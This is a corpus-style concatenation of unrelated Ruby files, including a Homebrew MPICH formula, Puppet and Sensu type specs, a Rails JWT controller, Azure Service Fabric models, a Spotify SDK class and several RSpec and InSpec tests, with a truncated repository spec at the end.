conflicts_with "open-mpi", :because => "both install MPI compiler wrappers"
def install
if build.head?
# ensure that the consistent set of autotools built by homebrew is used to
# build MPICH, otherwise very bizarre build errors can occur
ENV["MPICH_AUTOTOOLS_DIR"] = HOMEBREW_PREFIX + "bin"
system "./autogen.sh"
end
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}",
"--mandir=#{man}"
system "make"
system "make", "check"
system "make", "install"
end
test do
(testpath/"hello.c").write <<~EOS
#include <mpi.h>
#include <stdio.h>
int main()
{
int size, rank, nameLen;
char name[MPI_MAX_PROCESSOR_NAME];
MPI_Init(NULL, NULL);
MPI_Comm_size(MPI_COMM_WORLD, &size);
MPI_Comm_rank(MPI_COMM_WORLD, &rank);
MPI_Get_processor_name(name, &nameLen);
printf("[%d/%d] Hello, world! My name is %s.\\n", rank, size, name);
MPI_Finalize();
return 0;
}
EOS
system "#{bin}/mpicc", "hello.c", "-o", "hello"
system "./hello"
system "#{bin}/mpirun", "-np", "4", "./hello"
(testpath/"hellof.f90").write <<~EOS
program hello
include 'mpif.h'
integer rank, size, ierror, tag, status(MPI_STATUS_SIZE)
call MPI_INIT(ierror)
call MPI_COMM_SIZE(MPI_COMM_WORLD, size, ierror)
call MPI_COMM_RANK(MPI_COMM_WORLD, rank, ierror)
print*, 'node', rank, ': Hello Fortran world'
call MPI_FINALIZE(ierror)
end
EOS
system "#{bin}/mpif90", "hellof.f90", "-o", "hellof"
system "./hellof"
system "#{bin}/mpirun", "-np", "4", "./hellof"
end
end
| 32.678571 | 94 | 0.643352 |
1d7d4c6dded703c2a16e473efaf32ebda2adcc05 | 2,260 | # frozen_string_literal: true
require 'spec_helper'
describe 'apache::mod::ext_filter', type: :class do
it_behaves_like 'a mod class, without including apache'
context 'on a Debian OS' do
let :facts do
{
osfamily: 'Debian',
operatingsystemrelease: '8',
lsbdistcodename: 'jessie',
operatingsystem: 'Debian',
id: 'root',
kernel: 'Linux',
path: '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
fqdn: 'test.example.com',
is_pe: false,
}
end
describe 'with no parameters' do
it { is_expected.to contain_apache__mod('ext_filter') }
it { is_expected.not_to contain_file('ext_filter.conf') }
end
describe 'with parameters' do
let :params do
{ ext_filter_define: { 'filtA' => 'input=A output=B',
'filtB' => 'input=C cmd="C"' } }
end
it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtA\s+input=A output=B$}) }
it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtB\s+input=C cmd="C"$}) }
end
end
context 'on a RedHat OS' do
let :facts do
{
osfamily: 'RedHat',
operatingsystemrelease: '6',
operatingsystem: 'RedHat',
id: 'root',
kernel: 'Linux',
path: '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
fqdn: 'test.example.com',
is_pe: false,
}
end
describe 'with no parameters' do
it { is_expected.to contain_apache__mod('ext_filter') }
it { is_expected.not_to contain_file('ext_filter.conf') }
end
describe 'with parameters' do
let :params do
{ ext_filter_define: { 'filtA' => 'input=A output=B',
'filtB' => 'input=C cmd="C"' } }
end
it { is_expected.to contain_file('ext_filter.conf').with_path('/etc/httpd/conf.d/ext_filter.conf') }
it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtA\s+input=A output=B$}) }
it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtB\s+input=C cmd="C"$}) }
end
end
end
| 34.242424 | 122 | 0.60531 |
bf9cf9ebcc1d0809f6b9d19305a8249bc592f6fa | 883 | class ApplicationController < ActionController::API
include ActionView::Rendering
include ActionController::MimeResponds
def token(user)
JWT.encode(
{ user_id: user.id, exp: (Time.now + 2.hours).to_i },
ENV['TOKEN_SECRET'],
'HS256'
)
end
def verify_token
@current_user = JWT.decode(
bearer_token,
ENV['TOKEN_SECRET'],
true,
{ algorithm: 'HS256' }
)[0]['user_id']
rescue StandardError => e
@error = e
render :unauthorized, formats: :json, status: :unauthorized
end
def current_user
User.find(@current_user)
end
def check_is_admin
render :no_access, formats: :json, status: :forbidden unless current_user.admin?
end
def sanitize(val)
ActionController::Base.helpers.sanitize(val)
end
private
def bearer_token
request.headers[:Authorization].split(' ').last
end
end
| 20.534884 | 84 | 0.667044 |
38e56481e0f908cbe63fdfbfd7ff67b30d027f79 | 5,336 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ServiceFabric::V6_2_0_9
module Models
#
# Statistics about setup or main entry point of a code package deployed on
# a Service Fabric node.
#
class CodePackageEntryPointStatistics
include MsRestAzure
# @return [String] The last exit code of the entry point.
attr_accessor :last_exit_code
# @return [DateTime] The last time (in UTC) when Service Fabric attempted
# to run the entry point.
attr_accessor :last_activation_time
# @return [DateTime] The last time (in UTC) when the entry point finished
# running.
attr_accessor :last_exit_time
# @return [DateTime] The last time (in UTC) when the entry point ran
# successfully.
attr_accessor :last_successful_activation_time
# @return [DateTime] The last time (in UTC) when the entry point finished
# running gracefully.
attr_accessor :last_successful_exit_time
# @return [String] Number of times the entry point has run.
attr_accessor :activation_count
# @return [String] Number of times the entry point failed to run.
attr_accessor :activation_failure_count
# @return [String] Number of times the entry point continuously failed to
# run.
attr_accessor :continuous_activation_failure_count
# @return [String] Number of times the entry point finished running.
attr_accessor :exit_count
# @return [String] Number of times the entry point failed to exit
# gracefully.
attr_accessor :exit_failure_count
# @return [String] Number of times the entry point continuously failed to
# exit gracefully.
attr_accessor :continuous_exit_failure_count
#
# Mapper for CodePackageEntryPointStatistics class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'CodePackageEntryPointStatistics',
type: {
name: 'Composite',
class_name: 'CodePackageEntryPointStatistics',
model_properties: {
last_exit_code: {
client_side_validation: true,
required: false,
serialized_name: 'LastExitCode',
type: {
name: 'String'
}
},
last_activation_time: {
client_side_validation: true,
required: false,
serialized_name: 'LastActivationTime',
type: {
name: 'DateTime'
}
},
last_exit_time: {
client_side_validation: true,
required: false,
serialized_name: 'LastExitTime',
type: {
name: 'DateTime'
}
},
last_successful_activation_time: {
client_side_validation: true,
required: false,
serialized_name: 'LastSuccessfulActivationTime',
type: {
name: 'DateTime'
}
},
last_successful_exit_time: {
client_side_validation: true,
required: false,
serialized_name: 'LastSuccessfulExitTime',
type: {
name: 'DateTime'
}
},
activation_count: {
client_side_validation: true,
required: false,
serialized_name: 'ActivationCount',
type: {
name: 'String'
}
},
activation_failure_count: {
client_side_validation: true,
required: false,
serialized_name: 'ActivationFailureCount',
type: {
name: 'String'
}
},
continuous_activation_failure_count: {
client_side_validation: true,
required: false,
serialized_name: 'ContinuousActivationFailureCount',
type: {
name: 'String'
}
},
exit_count: {
client_side_validation: true,
required: false,
serialized_name: 'ExitCount',
type: {
name: 'String'
}
},
exit_failure_count: {
client_side_validation: true,
required: false,
serialized_name: 'ExitFailureCount',
type: {
name: 'String'
}
},
continuous_exit_failure_count: {
client_side_validation: true,
required: false,
serialized_name: 'ContinuousExitFailureCount',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 32.339394 | 79 | 0.528298 |
87060f3b7f10b2d528b3416168e2e8824e3dd28f | 139 | # frozen_string_literal: true
module Spree
class PrototypeTaxon < Spree::Base
belongs_to :prototype
belongs_to :taxon
end
end
| 15.444444 | 36 | 0.748201 |
62004f3dbc6c7b47a164ef91c34420828a587a02 | 436 | # sets log level to :warning
Delayed::Backend::ActiveRecord::Job.class_eval do
class << self
def reserve_with_warning(*args, &block)
log_level = ActiveRecord::Base.logger.level
ActiveRecord::Base.logger.level = 1
reserve_without_warning(*args, &block)
ensure
ActiveRecord::Base.logger.level = log_level
end
alias_method_chain :reserve, :warning
end
end
Delayed::Worker.default_priority = 50 | 27.25 | 49 | 0.71789 |
876c06e867989394e52bee33693de2675559c0f4 | 3,114 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ServiceFabric::V6_5_0_36
module Models
#
# Represents health evaluation for a node, containing information about the
# data and the algorithm used by health store to evaluate health. The
# evaluation is returned only when the aggregated health state is either
# Error or Warning.
#
class NodeHealthEvaluation < HealthEvaluation
include MsRestAzure
def initialize
@Kind = "Node"
end
attr_accessor :Kind
# @return [String] The name of a Service Fabric node.
attr_accessor :node_name
# @return [Array<HealthEvaluationWrapper>] List of unhealthy evaluations
# that led to the current aggregated health state of the node. The types
# of the unhealthy evaluations can be EventHealthEvaluation.
attr_accessor :unhealthy_evaluations
#
# Mapper for NodeHealthEvaluation class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'Node',
type: {
name: 'Composite',
class_name: 'NodeHealthEvaluation',
model_properties: {
aggregated_health_state: {
client_side_validation: true,
required: false,
serialized_name: 'AggregatedHealthState',
type: {
name: 'String'
}
},
description: {
client_side_validation: true,
required: false,
serialized_name: 'Description',
type: {
name: 'String'
}
},
Kind: {
client_side_validation: true,
required: true,
serialized_name: 'Kind',
type: {
name: 'String'
}
},
node_name: {
client_side_validation: true,
required: false,
serialized_name: 'NodeName',
type: {
name: 'String'
}
},
unhealthy_evaluations: {
client_side_validation: true,
required: false,
serialized_name: 'UnhealthyEvaluations',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'HealthEvaluationWrapperElementType',
type: {
name: 'Composite',
class_name: 'HealthEvaluationWrapper'
}
}
}
}
}
}
}
end
end
end
end
| 30.23301 | 79 | 0.506744 |
7a34d1602e68668e70618a5c69ebe4297a0af5fd | 1,094 | module Minotaur
#
# supporting logic for 'pluggable' generator-sets
#
class Theme
include Minotaur
include Minotaur::Geometry
# helpers?
# hmmmmmm? is this even connected to anything? IS THIS THING ON
def self.current_theme
@@current_theme ||= DEFAULT_THEME
end
def self.generate(entity,opts={},&blk)
# # puts "=== "
generator = @@feature_generators[entity]
generator.call(opts, &blk)
end
class << self
def feature_generators
@@feature_generators ||= {}
end
def feature_names
feature_generators.keys
end
# def dungeon...
#def room(room_name=nil,opts={}, &blk)
# if room_name
# feature_generators[:rooms][room_name.to_sym] = block
# # this is a particular room -- remember it
# # TODO expose a helper to build this room
# else
# feature_generators[:room] = block
# end
#end
def method_missing(method_name, *args, &block)
feature_generators[method_name] = block
end
end
end
end
| 22.791667 | 67 | 0.603291 |
f8b42ab8814763a6c8d7f5ae7475b57af05ce512 | 382 | class DisallowNullOnForeignKeys < ActiveRecord::Migration
def up
change_column_null :topics, :board_id, false
change_column_null :posts, :topic_id, false
change_column_null :images, :post_id, false
end
def down
change_column_null :topics, :board_id, true
change_column_null :posts, :topic_id, true
change_column_null :images, :post_id, true
end
end
| 27.285714 | 57 | 0.751309 |
f8a19d396f753685ce502fd4db50907df3c12d79 | 2,957 | #
# Copyright (c) 2006-2010 National ICT Australia (NICTA), Australia
#
# Copyright (c) 2004-2009 WINLAB, Rutgers University, USA
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#
# = moteAppContext.rb
#
# == Description
#
# This class defines a Mote Application Context.
# It behaves exactly like an Application Context but it
# overrides the startApplication method to send a special
# command to the Resource Controller
#
require 'omf-expctl/application/appContext.rb'
class MoteAppContext < AppContext
#
# Start a mote Application on a given Node Set
# This method creates and sends the Command Object to start
# a mote application on a group of nodes (resources)
#
# - nodeSet = the group of nodes on which to start the application
#
def startApplication(nodeSet)
debug("Starting application '#@id'")
# Get a new Command Object and starting adding info to it
appDef = @app.appDefinition
cmd = ECCommunicator.instance.create_message(:cmdtype => :MOTE_EXECUTE,
:target => nodeSet.groupName,
:appID => @id,
:gatewayExecutable => appDef.gatewayExecutable)
# Add the OML info, if any...
omlconf = getOMLConfig(nodeSet)
cmd.omlConfig = omlconf if omlconf != nil
# Add the environment info...
cmd.env = ""
getENVConfig(nodeSet).each { |k,v|
cmd.env << "#{k}=#{v} "
}
# Add the bindings...
pdef = appDef.properties
# check if bindings contain unknown parameters
if (diff = @bindings.keys - pdef.keys) != []
raise "Unknown parameters '#{diff.join(', ')}'" \
+ " not in '#{pdef.keys.join(', ')}'."
end
cmd.cmdLineArgs = appDef.getCommandLineArgs(@bindings, @id, nodeSet).join(' ')
# Ask the NodeSet to send the Command Object
nodeSet.send(cmd)
end
end # ApplicationContext
| 38.402597 | 96 | 0.681434 |
8704d594f28f11985d22b878560f25a0d33cffa4 | 354 | ActiveRecord::Schema.define do
self.verbose = false
create_table :tags, :force => true do |t|
t.string :name
t.timestamps
end
create_table :topics, :force => true do |t|
t.string :name
t.timestamps
end
create_table :tags_topics, :force => true do |t|
t.belongs_to :tag
t.belongs_to :topic
t.timestamps
end
end | 18.631579 | 50 | 0.655367 |
629d48badde052f64c20b0c8d4fe34b94c41803a | 4,794 | require 'spec_helper'
require 'puppet/type/sensu_hook'
describe Puppet::Type.type(:sensu_hook) do
let(:default_config) do
{
name: 'test',
command: 'test',
}
end
let(:config) do
default_config
end
let(:hook) do
described_class.new(config)
end
it 'should add to catalog without raising an error' do
catalog = Puppet::Resource::Catalog.new
expect {
catalog.add_resource hook
}.to_not raise_error
end
it 'should require a name' do
expect {
described_class.new({})
}.to raise_error(Puppet::Error, 'Title or name must be provided')
end
defaults = {
'namespace': 'default',
'timeout': 60,
'stdin': :false,
}
# String properties
[
:command,
:namespace,
].each do |property|
it "should accept valid #{property}" do
config[property] = 'foo'
expect(hook[property]).to eq('foo')
end
if default = defaults[property]
it "should have default for #{property}" do
expect(hook[property]).to eq(default)
end
else
it "should not have a default for #{property}" do
expect(hook[property]).to eq(default_config[property])
end
end
end
# String regex validated properties
[
:name,
].each do |property|
it "should not accept invalid #{property}" do
config[property] = 'foo bar'
expect { hook }.to raise_error(Puppet::Error, /#{property.to_s} invalid/)
end
end
# Array properties
[
].each do |property|
it "should accept valid #{property}" do
config[property] = ['foo', 'bar']
expect(hook[property]).to eq(['foo', 'bar'])
end
if default = defaults[property]
it "should have default for #{property}" do
expect(hook[property]).to eq(default)
end
else
it "should not have a default for #{property}" do
expect(hook[property]).to eq(default_config[property])
end
end
end
# Integer properties
[
:timeout,
].each do |property|
it "should accept valid #{property}" do
config[property] = 30
expect(hook[property]).to eq(30)
end
it "should accept valid #{property} as string" do
config[property] = '30'
expect(hook[property]).to eq(30)
end
it "should not accept invalid value for #{property}" do
config[property] = 'foo'
expect { hook }.to raise_error(Puppet::Error, /should be an Integer/)
end
if default = defaults[property]
it "should have default for #{property}" do
expect(hook[property]).to eq(default)
end
else
it "should not have a default for #{property}" do
expect(hook[property]).to eq(default_config[property])
end
end
end
# Boolean properties
[
:stdin
].each do |property|
it "should accept valid #{property}" do
config[property] = true
expect(hook[property]).to eq(:true)
end
it "should accept valid #{property}" do
config[property] = false
expect(hook[property]).to eq(:false)
end
it "should accept valid #{property}" do
config[property] = 'true'
expect(hook[property]).to eq(:true)
end
it "should accept valid #{property}" do
config[property] = 'false'
expect(hook[property]).to eq(:false)
end
it "should not accept invalid #{property}" do
config[property] = 'foo'
expect { hook }.to raise_error(Puppet::Error, /Invalid value "foo". Valid values are true, false/)
end
if default = defaults[property]
it "should have default for #{property}" do
expect(hook[property]).to eq(default)
end
else
it "should not have a default for #{property}" do
expect(hook[property]).to eq(default_config[property])
end
end
end
# Hash properties
[
:labels,
:annotations,
].each do |property|
it "should accept valid #{property}" do
config[property] = { 'foo': 'bar' }
expect(hook[property]).to eq({'foo': 'bar'})
end
it "should not accept invalid #{property}" do
config[property] = 'foo'
expect { hook }.to raise_error(Puppet::Error, /should be a Hash/)
end
if default = defaults[property]
it "should have default for #{property}" do
expect(hook[property]).to eq(default)
end
else
it "should not have a default for #{property}" do
expect(hook[property]).to eq(default_config[property])
end
end
end
include_examples 'autorequires' do
let(:res) { hook }
end
[
:command,
].each do |property|
it "should require property when ensure => present" do
config.delete(property)
config[:ensure] = :present
expect { hook }.to raise_error(Puppet::Error, /You must provide a #{property}/)
end
end
end
| 25.913514 | 104 | 0.617021 |
010817193f15d242b11311b9634126e3295b24d1 | 443 | module ActsAsDynamicRoute
module Hook
def self.included(base)
base.extend(ClassMethods)
end
module ClassMethods
def acts_as_dynamic_route(field, *args)
DynamicRouter.send(:register, self, field, *args)
class_eval %Q?
after_save :reload_routes
def reload_routes
DynamicRouter.reload
end
private :reload_routes
?
end
end
end
end
| 20.136364 | 57 | 0.611738 |
26d0fa95f92cd077c6d77b45f03ad606e368a7f0 | 640 | class UpdateBudget
attr_accessor :budget
def initialize(budget:)
self.budget = budget
end
def call(attributes: {})
budget.assign_attributes(attributes)
convert_and_assign_value(budget, attributes[:value])
result = if budget.valid?
Result.new(budget.save, budget)
else
Result.new(false, budget)
end
result
end
private
def convert_and_assign_value(budget, value)
budget.value = ConvertFinancialValue.new.convert(value.to_s)
rescue ConvertFinancialValue::Error
budget.errors.add(:value, I18n.t("activerecord.errors.models.budget.attributes.value.not_a_number"))
end
end
| 21.333333 | 104 | 0.726563 |
f7742007ef0df97b1eba625857112158ed031dc2 | 4,293 | # frozen_string_literal: true
module Spotify
class SDK
class Item < Model
##
# Let's transform the item object into better for us.
# Before: { track: ..., played_at: ..., context: ... }
# After: { track_properties..., played_at: ..., context: ... }
#
# :nodoc:
def initialize(payload, parent)
track = payload.delete(:track) || payload.delete(:item)
properties = payload.except(:parent, :device, :repeat_state, :shuffle_state)
super(track.merge(properties: properties), parent)
end
##
# Get the album for this item.
#
# @example
# @sdk.connect.playback.item.album
#
# @return [Spotify::SDK::Album] album The album object, wrapped in Spotify::SDK::Album
#
def album
Spotify::SDK::Album.new(super, parent)
end
##
# Get the artists/creators for this item.
#
# @example
# @sdk.connect.playback.item.artists
#
# @return [Array] artists A list of artists, wrapped in Spotify::SDK::Artist
#
def artists
super.map do |artist|
Spotify::SDK::Artist.new(artist, parent)
end
end
##
# Get the primary artist/creator for this item.
#
# @example
# @sdk.connect.playback.item.artist
#
# @return [Spotify::SDK::Artist] artist The primary artist, wrapped in Spotify::SDK::Artist
#
def artist
artists.first
end
##
# Get the context.
#
# @example
# @sdk.connect.playback.item.context
# @sdk.me.history[0].context
#
# @return [Hash] context Information about the user's context.
#
alias_attribute :context, "properties.context"
##
# Get the duration.
# Alias to self.duration_ms
#
# @example
# @sdk.connect.playback.item.duration # => 10331
#
# @return [Integer] duration_ms In milliseconds, how long the item is.
#
alias_attribute :duration, :duration_ms
##
# Is this track explicit?
# Alias to self.explicit
#
# @example
# @sdk.connect.playback.item.explicit? # => true
#
# @return [TrueClass,FalseClass] is_explicit Returns true if item contains explicit content.
#
alias_attribute :explicit?, :explicit
##
# Is this a local track, not a Spotify track?
# Alias to self.is_local
#
# @example
# @sdk.connect.playback.item.local? # => false
#
# @return [TrueClass,FalseClass] is_local Returns true if item is local to the user.
#
alias_attribute :local?, :is_local
##
# Is this a playable track?
# Alias to self.is_playable
#
# @example
# @sdk.connect.playback.item.playable? # => false
#
# @return [TrueClass,FalseClass] is_playable Returns true if item is playable.
#
alias_attribute :playable?, :is_playable
##
# Is this a track?
# Alias to self.type == "track"
#
# @example
# @sdk.connect.playback.item.track? # => true
#
# @return [TrueClass,FalseClass] is_track Returns true if item is an music track.
#
def track?
type == "track"
end
##
# Get the Spotify URI for this item.
# Alias to self.uri
#
# @example
# @sdk.connect.playback.item.spotify_uri # => "spotify:track:..."
#
# @return [String] spotify_uri The direct URI to this Spotify resource.
#
alias_attribute :spotify_uri, :uri
##
# Get the Spotify HTTP URL for this item.
# Alias to self.external_urls[:spotify]
#
# @example
# @sdk.connect.playback.item.spotify_url # => "https://open.spotify.com/..."
#
# @return [String] spotify_url The direct HTTP URL to this Spotify resource.
#
alias_attribute :spotify_url, "external_urls.spotify"
##
# Get the ISRC for this track.
#
# @example
# @sdk.connect.playback.item.isrc # => "USUM00000000"
#
# @return [String] isrc The ISRC string for this track.
#
alias_attribute :isrc, "external_ids.isrc"
end
end
end
| 27.170886 | 98 | 0.567901 |
bf99855f54d21a9e4ba46a3e90d45438685041f2 | 962 | # encoding: utf-8
# frozen_string_literal: true
# A utility that takes a class and a data hash. Creates an instance of the
# class and assigns relevant data from the hash to the instance.
class ObjectFactory
attr_reader :instance
def initialize(object)
@instance = object.new
end
def build(data)
@data = data
manufacture
self
end
private
def manufacture
@data.keys.each do |attribute|
next if skip_attribue?(attribute) || @data[attribute].blank?
assign_value_to_attribute(attribute, @data[attribute])
end
end
def skip_attribue?(attribute)
attribute.to_s.include? 'id'
end
def assign_value_to_attribute(attribute, value)
message = "#{attribute}="
if @instance.respond_to? message
@instance.public_send(message, parse_value(attribute, value))
end
end
def parse_value(attribute, value)
return Time.zone.parse(value) if attribute.to_s.include? '_at'
value
end
end
| 21.863636 | 74 | 0.70894 |
4a4cd0d834412b155e3c219220923d87aafa3b9d | 3,954 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'json'
project_id = attribute('project_id')
basename = attribute('name')
authorized_network = attribute('authorized_network')
region = "us-central1"
activation_policy = "ALWAYS"
availability_type = "REGIONAL"
data_disk_size_gb = 10
data_disk_type = "PD_SSD"
kind = "sql#settings"
pricing_plan = "PER_USE"
replication_type = "SYNCHRONOUS"
storage_auto_resize = true
storage_auto_resize_limit = 0
tier = "db-custom-2-13312"
describe command("gcloud --project='#{project_id}' sql instances describe #{basename} --format=json") do
its(:exit_status) { should eq 0 }
its(:stderr) { should eq '' }
let!(:data) do
if subject.exit_status == 0
JSON.parse(subject.stdout)
else
{}
end
end
describe "mssql_ha_database" do
it "global settings are valid" do
expect(data['settings']['activationPolicy']).to eq "#{activation_policy}"
expect(data['settings']['availabilityType']).to eq "#{availability_type}"
expect(data['settings']['dataDiskSizeGb']).to eq "#{data_disk_size_gb}"
expect(data['settings']['dataDiskType']).to eq "#{data_disk_type}"
expect(data['settings']['kind']).to eq "#{kind}"
expect(data['settings']['pricingPlan']).to eq "#{pricing_plan}"
expect(data['settings']['replicationType']).to eq "#{replication_type}"
expect(data['settings']['storageAutoResize']).to eq storage_auto_resize
expect(data['settings']['storageAutoResizeLimit']).to eq "#{storage_auto_resize_limit}"
expect(data['settings']['tier']).to eq "#{tier}"
end
it "backend type is valid" do
expect(data['backendType']).to eq 'SECOND_GEN'
end
it "database versions is valid" do
expect(data['databaseVersion']).to eq 'SQLSERVER_2017_STANDARD'
end
it "state is valid" do
expect(data['state']).to eq 'RUNNABLE'
end
it "region is valid" do
expect(data['region']).to eq region
end
it "gce zone is valid" do
expect(data['gceZone']).to eq "#{region}-a"
end
it "location preference is valid" do
expect(data['settings']['locationPreference']).to include(
"kind" => "sql#locationPreference",
"zone" => "#{region}-a")
end
it "maintenance window is valid" do
expect(data['settings']['maintenanceWindow']).to include(
"kind" => "sql#maintenanceWindow",
"day" => 7,
"hour" => 12,
"updateTrack" => "stable")
end
it "ip configuration and authorized networks are valid" do
expect(data['settings']['ipConfiguration']).to include(
["authorizedNetworks"][0] => [{
"kind" => "sql#aclEntry",
"name" => "#{project_id}-cidr",
"value" => authorized_network
}],
"ipv4Enabled" => true,
"requireSsl" => true,
)
end
it "user labels are set" do
expect(data['settings']['userLabels']).to include(
"foo" => "bar")
end
end
end
describe command("gcloud --project='#{project_id}' sql users list --instance #{basename} --format=json") do
its(:exit_status) { should eq 0 }
its(:stderr) { should eq '' }
let!(:data) do
if subject.exit_status == 0
JSON.parse(subject.stdout)
else
{}
end
end
describe "mssql_ha_database" do
it "has 3 users" do
expect(data.select {|k,v| k['name'].start_with?("tftest")}.size).to eq 3
end
end
end
| 30.415385 | 107 | 0.651492 |
f7005103cb083f45c29506d16883c6370ff5ad9c | 150 | # Load the rails application
require File.expand_path('../application', __FILE__)
# Initialize the rails application
Static::Application.initialize!
| 25 | 52 | 0.8 |
1d05144ee9a75a681b817ead8ceed7dcc8d1cf88 | 858 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/google_ads/v0/enums/keyword_match_type.proto
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_message "google.ads.googleads.v0.enums.KeywordMatchTypeEnum" do
end
add_enum "google.ads.googleads.v0.enums.KeywordMatchTypeEnum.KeywordMatchType" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :EXACT, 2
value :PHRASE, 3
value :BROAD, 4
end
end
module Google::Ads::GoogleAds::V0::Enums
KeywordMatchTypeEnum = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v0.enums.KeywordMatchTypeEnum").msgclass
KeywordMatchTypeEnum::KeywordMatchType = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v0.enums.KeywordMatchTypeEnum.KeywordMatchType").enummodule
end
| 39 | 179 | 0.794872 |
1a81c0548cd2627c5afcefbeb0fe608893bed45c | 1,456 | # Windows tests only run on Windows.
if ENV['OS'] == 'Windows_NT'
require 'spec_helper'
require 'em/pure_ruby'
require 'rubygems'
require 'appium_lib'
require 'rutl/appium/appium_extension'
require 'rutl/appium/appium_server'
require 'rutl/appium/windows_test_app_wrapper'
require 'rspec'
RSpec.describe 'windows tests' do
before(:all) do
@appium_server = AppiumServer.new
@appium_server.start
end
after(:all) do
@appium_server.stop
end
context 'with notepad' do
let(:app) do
RUTL::Application.new(family: :windows, type: :notepad,
views: 'spec/views/notepad')
end
after do
app.quit
end
it 'types some text and clears and retypes' do
string = 'hello'
edit_text.set string
screenshot
edit_text.clear
screenshot
edit_text.set string
screenshot
expect(edit_text).to eq(string)
end
end
context 'with my app' do
let(:app) do
RUTL::Application.new(family: :windows, type: :hello,
views: 'spec/views/hello')
end
after do
app.quit
end
it 'can close app' do
close_button.click
expect(app.open?).to be false
end
it 'can close app with exit button' do
exit_button.click
expect(app.open?).to be false
end
end
end
end
| 22.060606 | 63 | 0.587912 |
f860a4c0ce017eb230774ebf40483ec0f17dbeec | 998 | =begin
#Tatum API
## Authentication <!-- ReDoc-Inject: <security-definitions> -->
OpenAPI spec version: 3.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.31
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Tatum::InlineResponse20067
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'InlineResponse20067' do
before do
# run before each test
@instance = Tatum::InlineResponse20067.new
end
after do
# run after each test
end
describe 'test an instance of InlineResponse20067' do
it 'should create an instance of InlineResponse20067' do
expect(@instance).to be_instance_of(Tatum::InlineResponse20067)
end
end
describe 'test attribute "address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 24.341463 | 102 | 0.737475 |
18dad7d7530a69e423b0de28f90b6da9760413cb | 26,073 | require 'spec_helper'
require 'repositories/app_usage_event_repository'
module VCAP::CloudController
module Repositories
RSpec.describe AppUsageEventRepository do
subject(:repository) { AppUsageEventRepository.new }
describe '#find' do
context 'when the event exists' do
let(:event) { AppUsageEvent.make }
it 'should return the event' do
expect(repository.find(event.guid)).to eq(event)
end
end
context 'when the event does not exist' do
it 'should return nil' do
expect(repository.find('does-not-exist')).to be_nil
end
end
end
describe '#create_from_app' do
let(:parent_app) { AppModel.make(name: 'parent-app') }
let(:app) { AppFactory.make(app: parent_app, type: 'other') }
it 'will create an event which matches the app' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
expect(event.parent_app_name).to eq('parent-app')
expect(event.parent_app_guid).to eq(parent_app.guid)
expect(event.process_type).to eq('other')
end
it 'will create an event with default previous attributes' do
event = repository.create_from_app(app)
default_instances = App.db_schema[:instances][:default].to_i
default_memory = VCAP::CloudController::Config.config[:default_app_memory]
expect(event.previous_state).to eq('STOPPED')
expect(event.previous_instance_count).to eq(default_instances)
expect(event.previous_memory_in_mb_per_instance).to eq(default_memory)
end
context 'when a custom state is provided' do
let(:custom_state) { 'CUSTOM' }
it 'will populate the event with the custom state' do
event = repository.create_from_app(app, custom_state)
expect(event.state).to eq(custom_state)
event.state = app.state
expect(event).to match_app(app)
end
end
context 'when the app is created' do
context 'when the package is pending' do
before do
app.current_droplet.destroy
app.reload
end
it 'will create an event with pending package state' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
end
end
context 'when the package is staged' do
it 'will create an event with staged package state' do
